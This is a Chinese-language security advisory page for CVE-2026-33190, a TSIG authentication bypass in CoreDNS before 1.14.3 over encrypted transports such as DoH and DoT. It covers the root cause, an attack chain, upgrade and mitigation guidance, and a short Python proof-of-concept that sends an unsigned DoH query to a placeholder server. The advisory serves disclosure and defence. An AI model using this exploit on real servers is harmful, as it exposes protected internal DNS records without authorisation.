IPBUF安全漏洞报告
English
CVE-2026-33190 CVSS 7.5 高危

CVE-2026-33190 CoreDNS认证绕过漏洞

披露日期: 2026-05-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33190
漏洞类型
认证绕过
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
CoreDNS

相关标签

认证绕过CoreDNSDoHDoTDNS安全

漏洞概述

CoreDNS 1.14.3之前版本存在认证绕过漏洞。在DoT、DoH等非纯DNS传输下,tsig插件因信任传输层状态而未进行实际验证,导致攻击者可绕过TSIG认证访问受限资源。普通TCP/UDP不受影响。

技术细节

该漏洞源于CoreDNS的tsig插件在处理非纯DNS传输(DoT, DoH, DoH3, DoQ, gRPC)时的逻辑缺陷。插件本应独立验证DNS消息中的TSIG签名,但在受影响版本中,它错误地直接信任底层传输writer的`TsigStatus()`方法返回值。分析发现,DoH和DoH3的writer实现中,`TsigStatus()`始终返回nil(即成功);DoT服务器未正确设置`TsigSecret`;DoQ和gRPC的writer同样无条件返回nil。这意味着攻击者无需在数据包中携带有效的TSIG签名,即可通过上述加密协议向服务器发送DNS查询。这导致配置了`tsig require all`等严格策略的防护失效,未经认证的远程攻击者可成功读取本应受保护的DNS记录。

攻击链分析

STEP 1
侦察
攻击者识别出目标使用了CoreDNS,并开启了DoH、DoT、DoQ或gRPC等非纯DNS传输接口。
STEP 2
利用
攻击者通过上述传输协议发送一个未携带TSIG签名的DNS查询请求。
STEP 3
绕过验证
CoreDNS的tsig插件检查传输writer的TsigStatus(),由于该函数在非纯DNS传输下错误返回nil,服务器误认为认证通过。
STEP 4
信息泄露
攻击者成功获取本应受TSIG策略保护的内部域名解析记录。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import dns.message # Target CoreDNS DoH endpoint vulnerable to CVE-2026-33190 target_url = "https://coredns.example.com:443/dns-query" domain = "internal.example.com" # Create a DNS query without TSIG signature query = dns.message.make_query(domain, 'A') # Send query via DoH (Vulnerable transport) try: response = requests.post( target_url, headers={"Content-Type": "application/dns-message"}, data=query.to_wire(), verify=False # Ignore SSL cert for demo ) if response.status_code == 200: dns_resp = dns.message.from_wire(response.content) print(f"[+] Exploit Successful! Bypassed TSIG auth.") print(f"[+] Response for {domain}: {dns_resp.answer}") else: print("[-] Query failed.") except Exception as e: print(f"Error: {e}")

影响范围

CoreDNS < 1.14.3

防御指南

临时缓解措施
建议管理员尽快将CoreDNS升级至1.14.3或更高版本。如果无法立即升级,作为临时缓解措施,应关闭DoH、DoT、DoQ和gRPC插件,确保仅使用配置了TSIG的纯TCP/UDP DNS服务,或通过防火墙严格限制对加密DNS端口的访问,以防止未授权的远程访问。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表